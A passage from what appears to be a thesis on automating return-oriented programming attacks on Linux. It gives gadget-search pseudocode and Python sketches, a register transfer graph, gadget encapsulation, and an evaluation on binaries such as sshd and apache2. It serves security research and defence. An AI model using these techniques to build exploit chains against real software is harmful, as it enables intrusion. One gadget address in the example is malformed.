of the target program. This can be done by disassembling the executable file of the
program, or by disassembling the binary code of the program when it is loaded into
memory. Linux (like many other Unix-like operating systems) provides a mechanism
that describes each region of contiguous virtual memory in a process or thread.
Because this mechanism is simple to use (it only requires reading /proc/[pid]/maps),
we disassemble the program when it is loaded into memory.
Figure 4.3: Memory layout of a Linux process (regions shown, starting from address
0x00000000: text segment, data segment, BSS segment, heap, memory mapping, stack)
When a Linux process is loaded into memory, the OS creates different sections,
containing executable code and static or dynamic data (illustrated in Figure 4.3).
With ASLR enabled, the OS randomizes the stack, heap, and shared libraries, but not
the program image (text, data and bss segments) [8]. Therefore the addresses of the
gadgets found in the text segment remain unchanged even when ASLR is enabled. On the
other hand, when ASLR is disabled, the shared libraries are always mapped to the same
regions, so the library gadgets also have constant addresses on every program
invocation.
Programs can be manually compiled into position-independent executables (PIEs) and
loaded at multiple positions in memory, and many third-party applications (including
Mozilla Firefox) are deployed as PIEs (having the program logic wrapped in a shared
library). However, modern distributions compile only a selected group of programs as
PIEs, because doing so introduces a performance overhead at runtime.
In our implementation we use the fact that the text segment remains unchanged to
search for gadgets in this section. For systems where ASLR is disabled, we ensure
that the implementation takes into consideration all executable sections. Reading
/proc/[pid]/maps produces a listing such as the following (here for the init
process, read from /proc/1/maps):
08048000-08051000 r-xp 00000000 08:06 7209157 /sbin/init
08051000-08052000 r--p 00008000 08:06 7209157 /sbin/init
08052000-08053000 rw-p 00009000 08:06 7209157 /sbin/init
08053000-08074000 rw-p 00000000 00:00 0 [heap]
b7556000-b7557000 rw-p 00000000 00:00 0
b7575000-b76db000 r-xp 00000000 08:06 5243163 /lib/libc-2.11.3.so
b76db000-b76dc000 ---p 00166000 08:06 5243163 /lib/libc-2.11.3.so
b76dc000-b76de000 r--p 00166000 08:06 5243163 /lib/libc-2.11.3.so
b76de000-b76df000 rw-p 00168000 08:06 5243163 /lib/libc-2.11.3.so
b7731000-b7732000 rw-p 00000000 00:00 0
b7732000-b7751000 r-xp 00000000 08:06 5243156 /lib/ld-2.11.3.so
b7751000-b7752000 r--p 0001e000 08:06 5243156 /lib/ld-2.11.3.so
b7752000-b7753000 rw-p 0001f000 08:06 5243156 /lib/ld-2.11.3.so
bff91000-bffb2000 rw-p 00000000 00:00 0 [stack]
ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso]
Using process tracing (ptrace), we control the execution of the target program and
inspect its internal state. The PT_READ_I request (PTRACE_PEEKTEXT on Linux) allows
reading from any section of the running process. In this context, the text segment
is simply the /sbin/init region marked as r-xp. Once we are able to read the content
of this section, we can pass the data to the gadget search algorithm. In systems
where ASLR is disabled, all sections marked as r-xp are taken into consideration.
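The region selection described above can be sketched as follows. This is a minimal
illustration, not the thesis implementation: the names Region, parse_maps and
gadget_regions are hypothetical, the sample text is an excerpt of the listing above,
and paths containing spaces are not handled.

```python
from typing import NamedTuple


class Region(NamedTuple):
    start: int
    end: int
    perms: str
    path: str


def parse_maps(text: str) -> list[Region]:
    """Parse the text of /proc/[pid]/maps into Region records."""
    regions = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # skip blank or malformed lines
        start, end = (int(x, 16) for x in fields[0].split("-"))
        path = fields[5] if len(fields) > 5 else ""  # anonymous mappings have no path
        regions.append(Region(start, end, fields[1], path))
    return regions


def gadget_regions(regions, image_path, aslr_enabled=True):
    """Executable regions to scan: only the program image when ASLR is enabled."""
    executable = [r for r in regions if r.perms == "r-xp"]
    if aslr_enabled:
        return [r for r in executable if r.path == image_path]
    return executable


SAMPLE = """\
08048000-08051000 r-xp 00000000 08:06 7209157 /sbin/init
08052000-08053000 rw-p 00009000 08:06 7209157 /sbin/init
b7575000-b76db000 r-xp 00000000 08:06 5243163 /lib/libc-2.11.3.so
bff91000-bffb2000 rw-p 00000000 00:00 0 [stack]
"""
regions = parse_maps(SAMPLE)
for r in gadget_regions(regions, "/sbin/init"):
    print(f"{r.start:08x}-{r.end:08x} {r.path}")
```

With ASLR enabled only the text segment of the program image is returned; passing
aslr_enabled=False also returns the executable region of libc.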
4.2 Gadget Locations
The gadget search algorithm operates on chunks of binary data. It locates the bytes
0xc2 and 0xc3 (the ret opcodes), as well as pop reg; jmp reg instruction pairs, and
backtracks up to a user-defined threshold of bytes to find valid x86 instructions.
Pseudocode of the search algorithm is given below:
Algorithm 1 Gadget Search
Input: process segment as binary stream seg
Output: list of gadgets
 1: gadgets ← ∅
 2: for byte pos in seg do
 3:     if is_valid_suffix(pos) then
 4:         for i := 1 to threshold do
 5:             if x86_disasm(pos − i, pos) then
 6:                 add the gadget into gadgets
 7:             end if
 8:         end for
 9:     end if
10: end for
11: return gadgets
A threshold is necessary because otherwise the accumulated side effects of the
encountered instructions would make it infeasible to chain the gadgets. The
implementation depends on the libdisasm library. In this context, x86_disasm, used on
line 5 of Algorithm 1, provides basic disassembly of Intel x86 instructions from a
binary stream.
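The backtracking loop of Algorithm 1 can be sketched as follows. This is only an
illustration under stated assumptions: the decodes callback is a hypothetical stand-in
for x86_disasm, toy_decodes accepts nothing but one-byte pop reg opcodes, and the
suffix test is reduced to a plain ret (0xc3).

```python
def find_gadgets(seg: bytes, decodes, threshold: int = 8) -> list[tuple[int, bytes]]:
    """Return (offset, raw bytes) for every candidate gadget ending in ret.

    `decodes(raw)` is a caller-supplied predicate standing in for x86_disasm:
    it must return True when `raw` decodes into whole, valid instructions.
    """
    gadgets = []
    for pos, byte in enumerate(seg):
        if byte != 0xC3:              # simplified suffix test: plain `ret` only
            continue
        for i in range(1, threshold + 1):
            start = pos - i
            if start < 0:
                break                 # ran off the beginning of the segment
            if decodes(seg[start:pos]):
                gadgets.append((start, seg[start:pos + 1]))
    return gadgets


def toy_decodes(raw: bytes) -> bool:
    """Toy decoder (assumption): accepts only runs of `pop reg` (0x58..0x5F)."""
    return len(raw) > 0 and all(0x58 <= b <= 0x5F for b in raw)


code = bytes([0x90, 0x58, 0x5B, 0xC3])    # nop; pop eax; pop ebx; ret
found = find_gadgets(code, toy_decodes)
for offset, raw in found:
    print(offset, raw.hex())
```

Both pop ebx; ret and pop eax; pop ebx; ret are reported, which illustrates how
backtracking from the same ret yields several overlapping gadgets.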
Algorithm 2 is_valid_suffix
Input: byte address pos
Output: true if a valid gadget suffix, otherwise false
1: if pos[0] = 0xc3 or pos[0] = 0xc2 then
2:     return true
3: end if
4: if (pos[0] & 0xf8) = 0x58 and pos[1] = 0xff and (pos[2] & 0xf8) = 0xe0 then
5:     if (pos[0] & 7) = (pos[2] & 7) then
6:         return true
7:     end if
8: end if
9: return false

Each gadget obtained in the list will have a unique address. However, two or more
gadgets might contain identical instructions. To avoid having duplicate gadgets, the
machine code of each gadget is hashed, and a test for existence is performed before
the gadget is added.
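A possible rendering of the suffix test and of the duplicate check is sketched below.
The function names are illustrative, and SHA-1 is an arbitrary choice made here; the
text does not say which hash function the implementation uses.

```python
import hashlib


def is_valid_suffix(seg: bytes, pos: int) -> bool:
    """True if a free-branch suffix starts at seg[pos] (cf. Algorithm 2)."""
    if seg[pos] in (0xC3, 0xC2):                   # ret / ret imm16
        return True
    p = seg[pos:pos + 3]
    if len(p) == 3 and (p[0] & 0xF8) == 0x58 and p[1] == 0xFF and (p[2] & 0xF8) == 0xE0:
        return (p[0] & 7) == (p[2] & 7)            # pop r; jmp r on the same register
    return False


def unique_gadgets(gadgets):
    """Keep the first gadget seen for each distinct machine-code sequence."""
    seen, unique = set(), []
    for address, raw in gadgets:
        digest = hashlib.sha1(raw).digest()        # hash choice is an assumption
        if digest not in seen:
            seen.add(digest)
            unique.append((address, raw))
    return unique


print(is_valid_suffix(bytes([0x58, 0xFF, 0xE0]), 0))   # pop eax; jmp eax
print(is_valid_suffix(bytes([0x58, 0xFF, 0xE3]), 0))   # pop eax; jmp ebx
```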
The threshold defined in the gadget search algorithm can span the bytes of several
instructions, and since the search algorithm backtracks from a free-branch
instruction, it often happens that one gadget is a suffix of another gadget, such
that they differ only in the first few instructions. Therefore, in order to use
every gadget possible, each gadget is treated as a single-instruction gadget: only
the first instruction is taken into consideration, regardless of the number of
instructions that follow before the free-branch instruction. This treatment is only
feasible if the side effects of the other instructions are taken into consideration.
4.3 Considering Gadget Side-Effects
In order to eliminate the side effects of each gadget, we must determine the change
of state that each instruction of the gadget makes. Consider the following example
(obtained from Section 2.1.2):
0xB7F9E479: mov %edi, %edx; incl 0x5D5B14C4(%ebx); ret
In order to use the gadget above as a single-instruction gadget, taking into
consideration only mov %edi, %edx, we must ensure that incl 0x5D5B14C4(%ebx)
increments the value at a known writable location. Assuming that location 0x00000001
is writable and does not hold data used in the ROP attack, we can only use the gadget
if ebx is initialized to -0x5D5B14C3, so that ebx + 0x5D5B14C4 = 0x00000001. We can
resolve this issue by using a pop gadget to initialize ebx with this value before the
gadget is executed.
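The value that must be popped into the base register follows from 32-bit wrap-around
arithmetic. A short sketch of the calculation (the helper name base_for_target is
illustrative):

```python
MASK32 = 0xFFFFFFFF


def base_for_target(target: int, displacement: int) -> int:
    """32-bit base register value such that base + displacement == target."""
    return (target - displacement) & MASK32


ebx = base_for_target(0x00000001, 0x5D5B14C4)
print(hex(ebx))                               # two's-complement form of -0x5D5B14C3
print(hex((ebx + 0x5D5B14C4) & MASK32))       # address touched by the incl
```

The result is the 32-bit word that the pop gadget has to find on the stack.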
To address as many as possible of the known gadget side effects, we focus on the
following instruction types:
1. Memory Clobbering Instructions. This type of side effect is similar to the
example above. Generally speaking, memory clobbering occurs when a gadget
contains an instruction, between the first instruction and the free-branch
instruction, whose target operand is a memory location. The memory location is
referenced through CPU registers. Therefore, the side effects of this type of
instruction can be neutralized by inserting pop gadgets that initialize the
registers so that the memory access falls on a known location. Since the data
segment has constant offsets (as shown in Section 4.1), several memory locations
in this segment can be reserved as known clobbered locations. The only exception
to this rule is memory clobbering through a dereferenced esp register, which is
addressed in the 3rd category.
2. Register Clobbering Instructions. Similarly to the previous case, instructions
of this type have a register as the target operand. In this case we do not
eliminate the side effect; we only mark the register as clobbered by the
instruction. In special cases (mostly occurring in unintended instructions) where
the target operand of the first instruction in the gadget is a register that is
clobbered later, the gadget is disregarded. In any case, if the clobbered register
is esp, the gadget is also disregarded.
3. Stack Modification Instructions. The side effects of this category are the most
critical, since instructions of this type modify the stack, where the logic of the
ROP attack resides. Instructions that decrease the value of the stack pointer
(push, pusha, etc.) cannot be used, because they overwrite the region of the stack
where the addresses of the following gadgets are placed. Therefore gadgets
containing those instructions are disregarded. Gadgets that increase the value of
the stack pointer can be used, by placing dummy values on the stack. Note that
gadgets containing a pop, popa, etc. that is not the first instruction fit in the
2nd category as well: apart from introducing an additional dummy value on the
stack, the clobbered register must be taken into consideration.
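The three categories can be read as a small decision procedure over the instructions
that follow the first one. The sketch below is a simplified model, not the thesis
implementation: Insn and SideEffects are hypothetical records, popa is not modelled,
and rejecting memory writes through esp is an assumption made here for brevity.

```python
from dataclasses import dataclass, field


@dataclass
class Insn:
    mnemonic: str
    dest_kind: str = ""   # "reg", "mem", or "" when nothing is written
    dest: str = ""        # register written, or base register of the memory operand


@dataclass
class SideEffects:
    usable: bool = True
    clobbered: set = field(default_factory=set)   # registers overwritten later on
    mem_bases: set = field(default_factory=set)   # registers to preset via pop gadgets
    dummy_words: int = 0                          # stack padding consumed by later pops


def analyse(gadget: list) -> SideEffects:
    """Classify the side effects of every instruction after the first one."""
    first, rest = gadget[0], gadget[1:]
    fx = SideEffects()
    for insn in rest:
        if insn.mnemonic == "ret":
            break
        if insn.mnemonic in ("push", "pusha"):
            fx.usable = False                     # category 3: overwrites the chain
        elif insn.mnemonic == "pop":
            fx.dummy_words += 1                   # category 3: needs a dummy value
            fx.clobbered.add(insn.dest)           # and clobbers a register (category 2)
        elif insn.dest_kind == "mem":
            if insn.dest == "esp":
                fx.usable = False                 # assumption: reject writes via esp
            else:
                fx.mem_bases.add(insn.dest)       # category 1
        elif insn.dest_kind == "reg":
            fx.clobbered.add(insn.dest)           # category 2
    if "esp" in fx.clobbered:
        fx.usable = False
    if first.dest_kind == "reg" and first.dest in fx.clobbered:
        fx.usable = False                         # result of the first insn is lost
    return fx


# mov %edi, %edx; incl 0x5D5B14C4(%ebx); ret
example = [Insn("mov", "reg", "edx"), Insn("inc", "mem", "ebx"), Insn("ret")]
print(analyse(example))
```

For the example gadget the result marks ebx as a register that has to be preset with
a pop gadget, and reports no clobbered registers.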
4.4 Gadget Classification
Once each side effect is taken into consideration, the gadget can be classified
according to its first instruction. In our implementation we classify the gadgets
into 13 groups:
1. Stack manipulation: pop
2. Data transfer gadgets: mov, xchg, les, lea, etc.
3. Arithmetic gadgets: add, sub, inc, dec, shr, shl, etc.
4. Logic: and, or, xor, not, etc.
5. Control flow manipulation: jmp, call, etc.
6. Interrupts: int, int3, iret, into, bound, etc.
7. Comparison: cmp, test, etc.
8. System calls: in, out, wait, ins, etc.
9. Bit manipulation: btr, etc.
10. Flag manipulation: cld, clc, stc, std, cmc, etc.
11. Floating point unit manipulation: fadd, fsub, fmul, fdiv, etc.
12. String manipulation: movs, cmps, scas, lods, etc.
13. Other: nop
As this work targets stand-alone binaries, even a rudimentary inspection of the
gadget lists obtained from such binaries shows that the number of gadgets in the
first 6 groups significantly surpasses the number of gadgets in the other groups.
This is because most commonly used binaries do not extensively use floating point
operations, nor do they invoke interrupts or system calls. Consequently, the
implementation in this work completely disregards gadgets in groups 8 to 13.
The most frequently found gadgets are pop reg gadgets, which in most cases cover all
8 CPU registers. Data transfer gadgets are found less frequently. Finally, almost
every stand-alone binary has at least one of each of the arithmetic and logic
gadgets. The gadget classification notably narrows the gadget search space and is
used in the next step, namely the generation of the register transfer graph.
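Classification by first instruction amounts to a lookup on the mnemonic. A minimal
sketch, listing only the example mnemonics named above for groups 1 to 7 (the table
and function names are illustrative; mnemonics of groups 8 to 13 map to None, since
those gadgets are disregarded):

```python
GROUPS = {
    "stack manipulation": {"pop"},
    "data transfer": {"mov", "xchg", "les", "lea"},
    "arithmetic": {"add", "sub", "inc", "dec", "shr", "shl"},
    "logic": {"and", "or", "xor", "not"},
    "control flow": {"jmp", "call"},
    "interrupts": {"int", "int3", "iret", "into", "bound"},
    "comparison": {"cmp", "test"},
}

# Invert the table once: mnemonic -> group name.
GROUP_OF = {m: group for group, mnemonics in GROUPS.items() for m in mnemonics}


def classify(first_mnemonic: str):
    """Group of a gadget, decided by its first instruction; None if disregarded."""
    return GROUP_OF.get(first_mnemonic)


for mnemonic in ("pop", "xchg", "xor", "fadd"):
    print(mnemonic, "->", classify(mnemonic))
```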
4.5 Building the Register Transfer Graph
The register transfer graph (RTG) is a directed graph representing the data movement
between CPU registers and memory. Each node in the graph represents either a CPU
register or a memory location referenced by a register, with or without a particular
displacement. Each edge in the graph represents a gadget containing an instruction
that passes data from one node to the other. The edge labels give the instruction
used to transfer the data between the nodes, and the registers listed in brackets
are the registers clobbered as a result of using the gadget represented by the edge.
Figure 4.4: Apache/2.2.17 (Linux/SUSE) register transfer graph. Nodes are CPU
registers (eax, ebx, ecx, edx, esi, edi, ebp, esp, al, dl) and memory addresses
(ecx + 0x2be8, ecx + 0x2344, edx + 0x8, eax + 0x8); edges denote data movement and
are labelled mov, xchg or or, with clobbered registers in brackets (for example
mov [esi,edi,] and mov [ebp,]).
The register transfer graph takes into consideration the data transfer gadgets and
the arithmetic and logical gadgets, such that:
• Data transfer gadgets. Once xchg and mov gadgets are found, they are inserted
directly into the graph as edges.
• Arithmetic gadgets. When add and sub gadgets are found, they are placed in the
graph only if the target can be initialized with 0. For the sake of simplicity,
only pop gadgets are considered as initialization gadgets. The initialization
gadgets are used prior to the use of the data transfer gadget.
• Logical gadgets. Similarly to the previous group, logical gadgets are also used
to transfer data between registers, but only if the target can be initialized. If
an or gadget is used, the target is initialized with 0; if an and gadget is used,
the target is initialized with 0xFFFFFFFF; and if a xor gadget is used, the target
is initialized with 0.
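The rules above can be sketched as an edge-construction routine. This is an
illustration under assumptions: gadgets are given as (mnemonic, destination, source)
triples, poppable is the set of registers for which a pop gadget exists, and xchg is
modelled as an edge in both directions. The sub case is left out of the sketch
because 0 - src yields the negated value, so it would need a further step to act as
a plain transfer.

```python
MASK32 = 0xFFFFFFFF

# Value the target must hold so that `op target, src` leaves src in target.
NEUTRAL = {"add": 0, "or": 0, "xor": 0, "and": MASK32}

# Reference semantics, used only to check the table above.
APPLY = {
    "add": lambda d, s: (d + s) & MASK32,
    "or": lambda d, s: d | s,
    "xor": lambda d, s: d ^ s,
    "and": lambda d, s: d & s,
}


def rtg_edges(gadgets, poppable):
    """Return edges (src, dst, mnemonic, init); init is popped into dst beforehand."""
    edges = []
    for mnemonic, dst, src in gadgets:
        if mnemonic == "mov":
            edges.append((src, dst, mnemonic, None))
        elif mnemonic == "xchg":
            edges.append((src, dst, mnemonic, None))
            edges.append((dst, src, mnemonic, None))
        elif mnemonic in NEUTRAL and dst in poppable:
            edges.append((src, dst, mnemonic, NEUTRAL[mnemonic]))
    return edges


found = [("mov", "eax", "edx"), ("or", "ecx", "eax"), ("and", "esi", "eax")]
edges = rtg_edges(found, poppable={"ecx"})
for edge in edges:
    print(edge)
```

The and gadget is skipped in this run because esi has no pop gadget in the assumed
input, so its target could not be initialized with 0xFFFFFFFF.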
The resulting graph will contain every data transfer between two nodes. Hence two
nodes might be connected by more than one edge. In order to optimize the generated
graph, the edges causing redundant side effects must be eliminated. In addition,
several memory nodes may load data from memory into a CPU register and the other way
around. These can be reduced to the most relevant memory nodes. We illustrate this
process in the following two sections.
4.5.1 Register Clobbering Edges
When two nodes in the graph are connected by more than one edge, we look closely at
the register clobbering imposed by the edge gadgets.
Figure 4.5: Edges with different sets of registers (edges between edx and eax:
mov [ebp, ecx, edi] and mov [ebp, ecx, ebx])
Figure 4.6: Edges having a subset of clobbered registers (edges between edx and eax:
or [ebp], mov [ebp, ecx] and mov [ebp, ecx, ebx])
To remove the redundant edges, we distinguish three cases:
• Two edges clobber different sets of registers, neither being a subset of the
other. This case is illustrated in Figure 4.5. Each edge generates different side
effects, so both edges are kept in the graph.
• The set of clobbered registers of one edge is a subset of the clobbered registers
of another edge. In this case, the edge with the larger set of clobbered registers
imposes redundant side effects and is therefore disregarded. Note that an edge with
no clobbered registers is just a special case of this rule. In the context of
Figure 4.6, the edge “or [ebp]” will be the only edge considered for data transfers
between edx and eax.
• Two edges have equal sets of clobbered registers. In this case the data transfer
gadgets (xchg and mov) take precedence over the other gadgets, because they do not
require initialization and therefore perform the data transfer more efficiently.
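The three cases can be expressed with set comparisons on the clobbered registers. A
minimal sketch, assuming the parallel edges between one pair of nodes are given as
(mnemonic, frozenset of clobbered registers) pairs; the function name is illustrative.

```python
TRANSFER = {"mov", "xchg"}


def prune_parallel_edges(edges):
    """Remove redundant edges among the parallel edges between one pair of nodes."""
    kept = []
    for op, clob in edges:
        # Case 2: drop the edge if another edge clobbers a strict subset of its set.
        if any(other < clob for _, other in edges):
            continue
        kept.append((op, clob))
    # Case 3: among edges with identical clobber sets, prefer data transfer gadgets.
    best = {}
    for op, clob in kept:
        current = best.get(clob)
        if current is None or (op in TRANSFER and current not in TRANSFER):
            best[clob] = op
    # Case 1: edges with incomparable clobber sets all survive.
    return [(op, clob) for clob, op in best.items()]


fig_4_6 = [
    ("or", frozenset({"ebp"})),
    ("mov", frozenset({"ebp", "ecx"})),
    ("mov", frozenset({"ebp", "ecx", "ebx"})),
]
print(prune_parallel_edges(fig_4_6))
```

Applied to the edges of Figure 4.6, only the or edge clobbering ebp remains.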
4.5.2 Memory Transfer Nodes
Redundant memory transfer nodes occur when several gadgets are found that transfer
data from memory to the same register.
Figure 4.7: Memory transfer nodes transferring data to one register (memory nodes
ecx + 0x70, ecx + 0x2344, ecx + 0x2be8 and ecx + 0x5abx, each connected to eax by a
mov edge)
To reduce the number of memory nodes created, we group the nodes dereferenced
through the same register. Within each group, the node having the lowest absolute
displacement value is kept, and the rest of the nodes are disregarded. The lowest
displacement is chosen only for convenience, since accessing the memory value of
that node requires initializing the dereferencing register by subtracting the
displacement value from the desired address.
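The selection rule can be sketched in a few lines. Memory nodes are modelled here as
(base register, displacement) pairs, which is an assumption of this sketch; the
sample values are taken from Figures 4.4 and 4.7.

```python
def select_memory_nodes(nodes):
    """Keep, for each base register, the node with the smallest |displacement|."""
    best = {}
    for base, disp in nodes:
        if base not in best or abs(disp) < abs(best[base]):
            best[base] = disp
    return best


nodes = [("ecx", 0x70), ("ecx", 0x2344), ("ecx", 0x2BE8), ("edx", 0x8)]
selected = select_memory_nodes(nodes)
print({base: hex(disp) for base, disp in selected.items()})
```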
4.6 Discovering Register Candidates
Once the complete graph is generated, we have all data movements between registers
and memory. This gives the opportunity to chain gadgets, by transferring the result
of one gadget to the input of another gadget. To narrow the search to the gadgets
that are able to chain their execution, we need to find the set of register
candidates: a set in which data transfers are possible from each register to every
other register. In terms of graph theory, this set of registers is simply a strongly
connected component of the graph. Below we provide pseudocode of Tarjan's algorithm,
which efficiently calculates the strongly connected components:
Algorithm 3 Tarjan
Input: start vertex v, stack S and graph G = (V, E)
v.index ← index
v.lowlink ← index
index ← index + 1
S.push(v)
for (v, w) ∈ E do
    if w.index is undefined then
        Tarjan(w)
        v.lowlink ← min(v.lowlink, w.lowlink)
    else if w ∈ S then
        v.lowlink ← min(v.lowlink, w.index)
    end if
end for
if v.lowlink = v.index then
    start a new strongly connected component
    repeat
        w ← S.pop()
        add w to current strongly connected component
    until w = v
    output the current strongly connected component
end if

Note that in this case every memory node in the graph can connect to any other
memory node in any direction. This is because data stored in memory can be reached
through both kinds of nodes, those that transfer data from a register to memory and
those that transfer it the other way around. To serve that purpose, we slightly
adjust the algorithm to take this case into consideration. Once memory is used to
pass data from one register to another, the data is written to a known location,
reserved in the data segment of the process image.
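A compact recursive rendering of Tarjan's algorithm, together with one possible way
to model the memory-node adjustment, is sketched below. The adjustment shown (adding
edges between all memory nodes before running the algorithm) and the choice of the
largest component as the candidate set are assumptions of this sketch; the text does
not specify how the implementation realises them.

```python
def strongly_connected_components(graph):
    """graph: dict mapping node -> iterable of successor nodes."""
    index, lowlink, on_stack = {}, {}, set()
    stack, components = [], []
    counter = 0

    def visit(v):
        nonlocal counter
        index[v] = lowlink[v] = counter
        counter += 1
        stack.append(v)
        on_stack.add(v)
        for w in graph.get(v, ()):
            if w not in index:
                visit(w)
                lowlink[v] = min(lowlink[v], lowlink[w])
            elif w in on_stack:
                lowlink[v] = min(lowlink[v], index[w])
        if lowlink[v] == index[v]:          # v is the root of a component
            component = set()
            while True:
                w = stack.pop()
                on_stack.discard(w)
                component.add(w)
                if w == v:
                    break
            components.append(component)

    for v in list(graph):
        if v not in index:
            visit(v)
    return components


def link_memory_nodes(graph, memory_nodes):
    """Copy of graph in which every memory node reaches every other memory node."""
    linked = {v: set(ws) for v, ws in graph.items()}
    for m in memory_nodes:
        linked.setdefault(m, set()).update(n for n in memory_nodes if n != m)
    return linked


def register_candidates(graph, memory_nodes):
    """Registers of the largest strongly connected component (assumed choice)."""
    components = strongly_connected_components(link_memory_nodes(graph, memory_nodes))
    largest = max(components, key=len)
    return {v for v in largest if v not in memory_nodes}


# Hypothetical toy graph: a store through ecx and a load through edx.
memory = {"[ecx+0x70]", "[edx+0x8]"}
toy = {"eax": ["ebx"], "ebx": ["[ecx+0x70]"], "[edx+0x8]": ["eax"], "ecx": ["eax"]}
print(register_candidates(toy, memory))
```

In the toy graph eax and ebx become mutually reachable only through memory, which is
why the memory nodes have to be linked before the components are computed.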
4.7 Encapsulation
The biggest challenge in chaining gadgets is taking every side effect into
consideration and ensuring a deterministic state in CPU registers, stack and memory.
As registers get clobbered even by a simple data movement, it is very difficult to
keep the state of the system in the registers. Instead, we propose a method to
maintain the state in main memory. This section demonstrates the full potential of
the register transfer graph and uses it extensively.
As already shown, the data section has constant offsets, so it can be used as a
place to maintain the state of our system. Once we have found the set of register
candidates, we consider the gadgets operating on memory operands and register
candidates. Each of these gadgets is then encapsulated with gadgets from the RTG to
ensure that the operation performed by the initial gadget reads its input from
memory and writes the result back to memory. The RTG provides gadgets that:
• Read data from memory, by finding the shortest paths from a memory node to
the source and target operand of the gadget being encapsulated.
• Write data to memory, by finding the shortest path from the target operand of
the gadget being encapsulated, to a memory node.
The encapsulation process provides a mechanism to create virtual registers that
reside in the data section. As the gadgets used only clobber CPU registers and
reserved addresses in the data section, each use of an encapsulated gadget will only
modify the values of the virtual registers. Furthermore, encapsulation requires only
one available gadget for each instruction in order to make it work with any memory
location. We call the encapsulated gadgets virtual instructions.
In order to illustrate gadget encapsulation, we assume that the attacked application
is Pidgin, and that the RTG is already generated, as shown in Figure 4.8.
Furthermore, we assume that an addition should be performed on two numbers available
in the data section (2 and 3) and the result stored to another location. Finally, we
also assume that only one add gadget is available:
0xb92689782: add %ebp, %ebx; ret;
Figure 4.8: Initial state (the RTG with nodes eax, ebx, ecx, edx, esi, edi, ebp,
esp, al and cl, connected by mov and xchg edges with clobbered registers in
brackets; the add ebp, ebx gadget; and a data segment holding the values 2 and 3)
Figure 4.9 shows how the operands ebp and ebx are loaded through the use of the RTG,
by reading data from memory referenced by eax.
Figure 4.9: Read from memory to ebp and ebx
Once the data is loaded into the gadget operands, the add gadget can be executed. The
result stored in ebx is then transferred back to memory, using the RTG and referencing
ecx (Figure 4.10).
The product of the encapsulation is the virtual instruction. It is represented as an
interleaved list of gadget addresses and values. This list consists of three parts:
the addresses of the gadgets corresponding to the edges along the shortest path from
a memory node to the source operands of the encapsulated gadget; the address of the
encapsulated gadget; and the addresses of the gadgets corresponding to the edges
along the shortest path from the target operand of the encapsulated gadget to a
memory node.
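The three-part structure of a virtual instruction can be sketched with a
breadth-first search over the RTG. Everything concrete below is hypothetical: the
graph, the gadget addresses and the function names are invented for illustration,
the interleaved values (such as the words consumed by pop gadgets that preset base
registers) are omitted, and clobbering between consecutive loads is not checked.

```python
from collections import deque


def shortest_path(rtg, start, goal):
    """Breadth-first search; returns the gadget addresses along a shortest path."""
    queue, seen = deque([(start, [])]), {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for succ, gadget_addr in rtg.get(node, ()):
            if succ not in seen:
                seen.add(succ)
                queue.append((succ, path + [gadget_addr]))
    return None


def encapsulate(rtg, gadget_addr, sources, target, mem_in, mem_out):
    """Build a virtual instruction: loads, the encapsulated gadget, then the store."""
    chain = []
    for reg in sources:
        load = shortest_path(rtg, mem_in, reg)
        if load is None:
            return None                 # operand cannot be loaded from memory
        chain += load
    chain.append(gadget_addr)
    store = shortest_path(rtg, target, mem_out)
    if store is None:
        return None                     # result cannot be written back
    return chain + store


# Hypothetical RTG: node -> [(successor, address of the gadget forming the edge)].
rtg = {
    "[eax]": [("edx", 0x1000)],
    "edx": [("ebp", 0x1010), ("ebx", 0x1020)],
    "ebx": [("esi", 0x1030)],
    "esi": [("[ecx]", 0x1040)],
}
ADD_GADGET = 0x2000                     # hypothetical address of `add ebp, ebx; ret`
virtual_add = encapsulate(rtg, ADD_GADGET, ["ebp", "ebx"], "ebx", "[eax]", "[ecx]")
print([hex(a) for a in virtual_add])
```

The resulting list starts with the two load paths, continues with the encapsulated
gadget, and ends with the store path, mirroring the three parts described above.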
Figure 4.10: Write the result back to memory (the data segment now holds 2, 3 and
the result 5)
5 Evaluation
To evaluate our approach for automating return oriented programming attacks, we used
OpenSUSE Linux 11.4 (x86) with W⊕X and ASLR enabled. ROP attacks are usually
conducted on vulnerable applications, by taking over the control of a computer from
another host (remote exploitation). Therefore the executables chosen for the
evaluation are primarily popular network applications, available in almost all Linux
distributions. We selected a set of 20 applications, ranging in size from 10 KB to
50 MB.
The first investigated metric is the number of register candidates, i.e. the
strongly connected component cardinality (SCCC) of the RTG. Figure 5.1 shows that
the number of register candidates tends to increase with the size of the binary. It
also indicates that many popular 32-bit Linux x86 servers and clients already
provide a set of at least 3 available registers, which is in many cases sufficient
to build ROP attacks.
Figure 5.1: Number of CPU candidates increases with the size of the binary (scatter
plot, one point per binary; x-axis: binary section size in bytes, logarithmic scale
from 10^4.5 to 10^7.5; y-axis: available x86 CPU registers, 0 to 8)
In Figure 5.2, we compare the set of register candidates with the fixed set of
registers (eax, ecx and edx) used in the generation of ROP-based kernel rootkits
[19]. The results of our approach show that the set of register candidates differs
between binaries, making it infeasible to rely on a fixed set of registers for the
automatic construction of ROP attacks.
Binary     SCCC  FSR      Binary     SCCC  FSR
chrome     8     ✓        yast2      4     ×
acroread   8     ✓        sshd       5     ×
skype      8     ✓        cupsd      3     ×
opera      8     ✓        apache2    3     ×
smbd       8     ✓        avahi      3     ×
mysqld     8     ✓        amarok     0     ×
filezilla  8     ✓        rpcbind    2     ×
Xorg       7     ✓        firefox    1     ×
dhclient   6     ×        master     0     ×
pidgin     5     ×        vlc        1     ×
Figure 5.2: Register candidates and feasibility with fixed set of registers
A high number of register candidates only suggests that gadget chaining will be
feasible. In order to evaluate the level of automation of gadget chaining, we
evaluate which logical, arithmetic, comparison and control flow modification gadgets
can be encapsulated, as shown in Figure 5.3.
Columns: add, sub, inc, dec, and, or, xor, not, neg, jmp, test, cmp, Other

Binary     Check marks (of 12)  Other
acroread   12                   call mul shl shr rol ror
skype      7                    call
opera      12                   call mul shl shr rol ror
smbd       12                   call
mysqld     12                   call mul shl shr rol ror
filezilla  12                   call
Xorg       11                   call
dhclient   11                   call
pidgin     11                   call
yast2      11                   call shl shr rol ror
sshd       10
cupsd      10                   call
apache2    9                    call
avahi      8                    call
amarok     0
rpcbind    3
firefox    4
master     1
vlc        2
Figure 5.3: Encapsulation on different instructions
Each check mark in Figure 5.3 indicates that the particular instruction can be
encapsulated into a virtual instruction. The results suggest that almost any binary
above 400 KB can provide a sufficient set of virtual instructions to build a ROP
attack.
6 Conclusion
6.1 Contribution
